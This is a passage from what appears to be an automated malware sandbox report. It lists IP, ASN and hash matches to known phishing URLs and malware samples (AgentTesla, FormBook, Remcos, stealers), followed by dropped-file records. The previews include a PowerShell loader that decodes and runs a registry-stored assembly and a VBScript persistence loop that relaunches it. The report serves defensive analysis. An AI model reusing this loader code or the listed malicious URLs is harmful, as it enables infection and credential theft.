s-part-0017.t-0009.t-msedge.net | https://precheckcar.com/wp-admin/common/oauth2/v2.0/authorize/?client_id=f01f3e6e-ddd5-44393-8b7f-1e5d6348b58a | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://precheckcar.com/wp-admin/ | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://offfryfjtht767755433.webflow.io/ | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://ipfs.fleek.co/ipfs/QmdUyj8NpxbikpMGxJdqQYKUS1Hhtm58Ji4zJDUeKEWSbd?filename=btcindex.html/ | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://bitvavo.debak.nl/signin-oidc | malicious | HTMLPhisher | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://www.google.ca/url?b21dp0=https://www.reillyreevesandhorton.edu&TA=DQ&TA=5E&bg=OW&TA=E7&TA=TV&q=%2561%256d%2570%2F%2568%256D%2539%2569%2531%2539%252E%2564%2565%256B%2563%2568%256F%2562%2574%2569%2565%2577%252E%2563%256F%256D%252F%2566%2569%256E%2561%256E%2563%2565%2540%2563%256F%256E%2564%2565%256E%2561%2573%2574%252E%2563%256F%256D&opdg=NTk&NXk=Zng&Q1k=R0g | malicious | HTMLPhisher | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Filikethislife.com%2Fwinner%2F0SfNj%2FY2N1ZGR5cmVAc3lmdGNvLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEm | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fnvchw.com%2Fwinner%2F1dsbr%2FcmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ==?0s57db=… | malicious | Unknown | 13.107.246.45
bg.microsoft.map.fastly.net | RFQ.exe | malicious | Quasar, PureLog Stealer | 199.232.210.172
bg.microsoft.map.fastly.net | possible SPAM## Msig Insurance Europe Complete via-Sign Monday January 2025.msg | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | 3ClBcOpPUX.exe | malicious | CyberGate | 199.232.210.172
bg.microsoft.map.fastly.net | 40#U0433.doc | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | KymUijfvKi.doc | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | Rev5_ Joint Declaration C5 GER_track changes.doc | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | RoYAd85faz.doc | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | 40#U0433.doc | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | RoYAd85faz.doc | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | 3.19.1+SetupWIService.exe | malicious | Unknown | 199.232.210.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | possible SPAM## Msig Insurance Europe Complete via-Sign Monday January 2025.msg | malicious | Unknown | 104.18.69.40
CLOUDFLARENETUS | 92.255.57_2.112.ps1 | malicious | LummaC | 188.114.96.3
CLOUDFLARENETUS | phishing.eml | malicious | Phisher | 188.114.96.3
CLOUDFLARENETUS | PI ITS15235.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 104.21.16.1
CLOUDFLARENETUS | https://tinyurl.com/286oc4ly | malicious | Unknown | 104.17.112.233
CLOUDFLARENETUS | http://hotpepperliberia.com | malicious | Unknown | 172.67.130.110
CLOUDFLARENETUS | https://email.lc.haxconsulting.com/c/eJx0k0tv4zgQhH-NdBk4kKgHrQMPdhI5mck78djJRaDIlsSYD4WkpLF__cJOsLvAZq_FLnbhQzWrBCdJS6-fh9_RaK9H9Muk6c9yE3LCCkjrLORGUaGJZGcd_cOMdoP0QrdnzKivt8pMGqzrRF_5fQ-EtqDZvqLOiVYDD4HEOMnxvMB5EoKiQlYKnKMtHLdv5i83BT5n4-tb-75JAbPHy6-p02-Mqp6KVv9LO9pyPE9ZwVKaZjlkgBjkRVEjHIIehTVagfakt4YPzAujw45EeRrF0RziBvIoyeskRxgwwlma0ajAPBQERSiL4jg55o2Ss2YOOYWszps4a5o6CtLoWwySdN73LkgWASoDVE7T9N-pAJXcTFoaymeOSmr3s3YQHGYDhSApG2GdrzRVECQXdyBkgHJJ_5GuqNsJ7QKUnzgEyYUGIbsvNY0644_656a874w-uqIs-lGk6Q-UFjiUrPpkKLQHq6kka1Q6vvq928YBWm7z65vVxHE3FgEq59i-jvvVs0xEw7L6_MK2IhvbP_TKJn77qF7k3TSixbC_V5cBWuI33j_fivpGtZOAqN0Zxga7eJCXr-uXzfMHlIcjgANevhv8USfN_ZM-L_Dhoeu38GTXt4sALYfFzheHl3LNy1VZjw8iQOU6QOWmvb3vrqbc9Y17WtynH9OVVkrF8qdedwDgHtt4eTkPpTn1ebm6Sd7eV-rWxvS93979kt02VOA7wwntRWisaIUm9SB3sxOQsLdmFBwskUA5M1oD88aGlvwv49CZwTIgJ_9MuHE2GbsDG3pyTPFtBE-YUdW31-YJ-Orvpo8E_RUAAP__dHE7Qw | malicious | Unknown | 104.17.113.39
CLOUDFLARENETUS | http://bebizicon.com/Campususa/index.xml#?email=b2xpdmllci5kb3phdEBpbm5vY2FwLmNvbQ== | malicious | EvilProxy, HTMLPhisher | 172.67.74.152
CLOUDFLARENETUS | https://fsgospefx6g2.sg.larksuite.com/wiki/Y7ybwFESRiirQPkoARZlhCyVgFb? | malicious | HTMLPhisher | 1.1.1.1
CLOUDFLARENETUS | http://mshare-54543.pages.dev/index-2tuka/ | malicious | Unknown | 172.66.47.106
VIVIDHOSTINGUS | rRef6010273.exe | malicious | AgentTesla | 162.254.34.31
VIVIDHOSTINGUS | rCHARTERREQUEST.exe | malicious | AgentTesla | 162.254.34.31
VIVIDHOSTINGUS | VYLigyTDuW.exe | malicious | AgentTesla | 162.254.34.31
VIVIDHOSTINGUS | Ref#66001032.exe | malicious | AgentTesla | 162.254.34.31
VIVIDHOSTINGUS | Ref#20203216.exe | malicious | AgentTesla | 162.254.34.31
VIVIDHOSTINGUS | arm4.elf | malicious | Mirai | 192.154.238.20
VIVIDHOSTINGUS | Ref#60031796.exe | malicious | AgentTesla | 162.254.34.31
VIVIDHOSTINGUS | Ref#1550238.exe | malicious | AgentTesla | 162.254.34.31
VIVIDHOSTINGUS | DJ5PhUwOsM.exe | malicious | AgentTesla, XWorm | 162.254.34.31
VIVIDHOSTINGUS | Ref#2056119.exe | malicious | AgentTesla, XWorm | 162.254.34.31
CONTABODE | trow.exe | malicious | Unknown | 5.189.128.121
CONTABODE | 17366735083ba4993c0ae9322c32aacf9286de757a918f634b522467c19ad3da2352651d39438.dat-decoded.exe | malicious | Remcos | 213.136.81.72
CONTABODE | 8L6MBxaJ2m.exe | malicious | FormBook | 161.97.142.144
CONTABODE | fqbVL4XxCr.exe | malicious | FormBook | 161.97.142.144
CONTABODE | plZuPtZoTk.exe | malicious | FormBook | 161.97.142.144
CONTABODE | 1SxKeB4u0c.exe | malicious | FormBook | 161.97.142.144
CONTABODE | uG3I84bQEr.exe | malicious | FormBook | 161.97.142.144
CONTABODE | 5CTbduoXq4.exe | malicious | FormBook | 161.97.142.144
CONTABODE | 0Wu31IhwGO.exe | malicious | FormBook | 161.97.142.144
CONTABODE | gKvjKMCUfq.exe | malicious | FormBook | 161.97.142.144
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | RFQ.exe | malicious | Quasar, PureLog Stealer | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | PI ITS15235.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | https://performancemanager10.successfactors.com/sf/hrisworkflowapprovelink?workflowRequestId=V4-0-a1-iHQRWD3bQis7XhhWNKzjfWwnvURbEsN0CxUc27Zt3ml0ag&company=oceanagoldT2&username=dave.oliver@oceanagold.com | malicious | Unknown | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | https://imtcoken.im/ | malicious | Unknown | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q | malicious | HTMLPhisher | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | http://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e | malicious | HTMLPhisher | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | https://eb-ri18.vercel.app/verset.html | malicious | HTMLPhisher | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | https://metahorizonsfacebooksupport.tempisite.com/italy39 | malicious | HTMLPhisher | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | http://ubiquitous-twilight-c9292b.netlify.app/ | malicious | Unknown | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | https://jaffeusacanna-9646.vercel.app/zqh.heups/ | malicious | HTMLPhisher | 104.26.12.205
                                    No context
                                    Process:C:\Windows\System32\wermgr.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.5343815601458936
                                    Encrypted:false
                                    SSDEEP:96:PWFZ0Kj1rxYidSRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTAJf/VXT5NHn:u7F1mGSR30wAAzuiFhZ24lO8
                                    MD5:E7B57D9B24D8432A4479E80C05DF64A0
                                    SHA1:1CA32D10E99885489D2CFDB5583A75F75BAA3590
                                    SHA-256:BC72211B59DD1E87614B10C2A13B9843E8C6A6A34B0EB8608FA645DE779B0936
                                    SHA-512:9184ED840B0BF729A128B2F58352610B84B4C45A21ABB9990C0549060F6F682ED2396DBF27704B7615A4CB9EAB4C6A8ED4A2504288BE7B5346D0ACFE4E7B58A3
                                    Malicious:false
                                    Reputation:low
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.3.1.9.6.8.1.2.1.4.5.0.3.1.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.3.1.9.4.6.9.2.4.7.3.4.4.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.3.2.4.a.9.9.a.-.b.f.c.4.-.4.a.f.f.-.b.4.a.8.-.f.0.7.7.a.3.e.1.c.d.3.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.9.c.-.0.0.0.1.-.0.0.1.4.-.a.3.4.8.-.e.b.3.a.6.4.6.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.
                                    Process:C:\Windows\System32\wermgr.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):7414
                                    Entropy (8bit):3.686027886401724
                                    Encrypted:false
                                    SSDEEP:96:RSIU6o7wVetb6bbvN6YN5ngmfHNV9re5Rwy55aMn3Tjm:R6l7wVeJ6bbvN6YN5ngmftq5pn3Tjm
                                    MD5:28DE7677289C46EC9D377F9B8FB8D342
                                    SHA1:750A6FA0F968090C4FEB2B5165261735CF420757
                                    SHA-256:079201C36C5197EA8273089131117BDFF9FE027346AD0E96499378AAB994554A
                                    SHA-512:947DE279396DC502DEEA6CFD431ECA80B96F69ACC370E2CBEDA997C9A1889169E952514DCBA261D4D7E4CAC742D134E7104DEFB927ADCB7C1DFB18E98CECA392
                                    Malicious:false
                                    Reputation:low
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.3.6.<./.P.i.
                                    Process:C:\Windows\System32\wermgr.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4899
                                    Entropy (8bit):4.568334921850061
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsfJg771I9n0WpW8VYRYm8M4JFKlnOtSFf4yq8vT0OtaytfBd:uIjfBI70t7VFJFKlnmWT0LufBd
                                    MD5:AC59CFDDAE827AA6BCDF15F742D5FFB4
                                    SHA1:057439C3A49BE6A4ABDFB68AD7B71E347571102B
                                    SHA-256:8DE28C1F996F15D732AD69850144DC23B5DAD966678036271DD631AB43244C2E
                                    SHA-512:0882513C2CD2924FB122D5B1DF8B11F4548862717599C588387A012DFD1129AB2677B39B4AD8F636BC5D32C1025B43C9DC55FA7B1BD657D24601C697E74C6957
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="675373" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):11887
                                    Entropy (8bit):4.901437212034066
                                    Encrypted:false
                                    SSDEEP:192:Zxoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9L:Srib4ZmVoGIpN6KQkj2Fkjh4iUxsNYWd
                                    MD5:ED30A738A05A68D6AB27771BD846A7AA
                                    SHA1:6AFCE0F6E39A9A59FF54956E1461F09747B57B44
                                    SHA-256:17D48B622292E016CFDF0550340FF6ED54693521D4D457B88BB23BD1AE076A31
                                    SHA-512:183E9ECAF5C467D7DA83F44FE990569215AFDB40B79BCA5C0D2C021228C7B85DF4793E2952130B772EC0896FBFBCF452078878ADF3A380A6D0A6BD00EA6663F2
                                    Malicious:false
                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):3256
                                    Entropy (8bit):5.404109340363203
                                    Encrypted:false
                                    SSDEEP:96:gEzlHyIFKL2O9qrh7Kf+oRJ5Eo9AdrxwN:V1yt2jrAfRLL2G
                                    MD5:047B195D3B8C00130835658997B1925D
                                    SHA1:5F77C7A5F798C4C0253839EBD7554B13987704E3
                                    SHA-256:B2C2801565403B2348CAF820F20B4B92C8725A5079D5360DAF455E84D28AC1FB
                                    SHA-512:D1724BE394B214B914A236AC1D55DB17B93669880BB3F71057DCD070AF3062FBFF494ABE085345015FCDF5FE6B11BAE9A19FCD20DC4EB749E13F31CD5565D60D
                                    Malicious:false
                                    Preview:@...e...........................................................H..............@-....f.J.|.7h8..q.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):252
                                    Entropy (8bit):5.461689719340332
                                    Encrypted:false
                                    SSDEEP:6:xVwe5ljxsu2xKbLtSXqo83mWngzsHg4HXZuBiA2V0LYC7zsHgB2eFI59:772EtSXqd27zmg4HJci1V0LYIzmg0eo
                                    MD5:C7CDD3174DC32767F2CC2DF349ECA42D
                                    SHA1:12F4B14FAD7684BDEA591434D442B6E08090BA81
                                    SHA-256:5CE8777F785CD74A693EEA29A30284D5EF2C8C1EB7C8343BC211F6821DBA0862
                                    SHA-512:FC15820CCD44797983B213C6B57CC8AC19491BCE94BDB0D44637287D5C9878445B98B542AC7F3EA4646C6FA5609AC99EBE72BA5FCD5F88F68D1433EAA722B3CF
                                    Malicious:false
                                    Preview:[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\bEvujIIdkyIbOgF' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('bEvujIIdkyIbOgF')..Stop-Process -Name conhost -Force..
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6225
                                    Entropy (8bit):3.7249737578253774
                                    Encrypted:false
                                    SSDEEP:96:8BM5Q2C8rEkvhkvCCtP19LQueiHZw9LQuezHZc:8i5QG0P1yKwy7c
                                    MD5:305066BBDC45E9918F0EE2CB1EA587ED
                                    SHA1:C53CC0051037F33A27EC9AE6BB3B69CA6063D2A4
                                    SHA-256:9876493A5BF35ED7872D4EA2AFC0C71298F031FB8BBC95E17E28BEE8C1CBBA21
                                    SHA-512:18B6A09BB0A341E47785307E27B18870A4C515ACCE645CD9CFE69E873A76AAA568F99DB9AD701BEE8531FCAA4E60F25DAD3174416EE0285B4C75F8BFACFCBD97
                                    Malicious:false
                                    Preview:...................................FL..................F.".. .....*_....k.:df..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_.....4.Xf.....;df......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.ZaI..........................3*N.A.p.p.D.a.t.a...B.V.1......Z.=..Roaming.@......EW.=.Z.=..............................R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Z.=..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Z.=..........................".7.W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Z.=....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Z.=....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.ZaI....9...........
                                    Process:C:\Windows\System32\wscript.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):2915
                                    Entropy (8bit):5.0505975283730935
                                    Encrypted:false
                                    SSDEEP:48:lnJrvgJXVv0qD4p7pYazwHYMH9KHaANMaBoqpotJ8gfng++E/uTcb6OqaBXl8zma:lJL4VvlDQepHXH4HaDaK8gPOOqav97ZS
                                    MD5:DDF1E2F5DE2CE71CCF56AF38DEDB27D0
                                    SHA1:0033A0EB6BABB97203CB8BB7F68287CFAC9D96DC
                                    SHA-256:0A988536FC481BD16AF5469D5FAA1BBB9DC321601DFA858479C01844A3CDD1C8
                                    SHA-512:F4E451051D3BF74FAF142973EF1F2A8C008D654F6D7178DBC426DCEEE2F16FB88C90980E3E12E77B3499D9F7A0BC4F36FAAFAD35FB52BB9C8F8BA03AE2585941
                                    Malicious:true
                                    Preview:Option Explicit..' Project name: bEvujIIdkyIbOgF.' Global variables.Dim ShellObjet, DossierWindows, CompteurIterations.Set ShellObjet = CreateObject("WScript.Shell").DossierWindows = ShellObjet.ExpandEnvironmentStrings("%windir%")..' Main program.Call Initialisation().Call ExecutionPrincipale()..' Initialisation of the program parameters.Sub Initialisation(). CompteurIterations = 0.End Sub..' Main routine managing program execution.Sub ExecutionPrincipale(). Do While CompteurIterations < 10000 ' Iteration limit for demonstration. Call VerifierEtDemarrerPowerShell(). WScript.Sleep 10000. CompteurIterations = CompteurIterations + 1. Loop.End Sub..' Procedure to check and start PowerShell if necessary.Sub VerifierEtDemarrerPowerShell(). If Not ProcessEnCours(ShellObjet.RegRead("HKEY_CURRENT_USER\Software\bEvujIIdkyIbOgF\i")) Then. If ShellObjet.RegRead("HKEY_CURRENT_USER\Software\bEvujIIdkyIbOgF\in") = "1"
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:Non-ISO extended-ASCII text, with very long lines (875), with CRLF line terminators, with escape sequences
                                    Category:dropped
                                    Size (bytes):1535
                                    Entropy (8bit):4.478053210063729
                                    Encrypted:false
                                    SSDEEP:24:EiNvPk/vNa2V269+Iz2HUdSjeKm3uSmcHsU9MxOAX4WLeX4WgeX4WgeX4WneX4WV:E8fWxZz2HUwysU9+OAX+X5XpXKX/XFXP
                                    MD5:A430FAAC8500758DEB4EC4B683FC67FD
                                    SHA1:9EA0D778BC2D1129A9EEE69C88BA4BB6C1D980CC
                                    SHA-256:92EEDA3B526893E695727BF47E32FA17FC2399FAEF376815E7A130CDD6189C67
                                    SHA-512:DBC248F21372A0E20C37DB066F4CB3775F232D5737BE8B7F8974A46F402B46C1705900CED0B47CAA6AADA82CAF1700059D10AE64DB25CE510646699D72567813
                                    Malicious:false
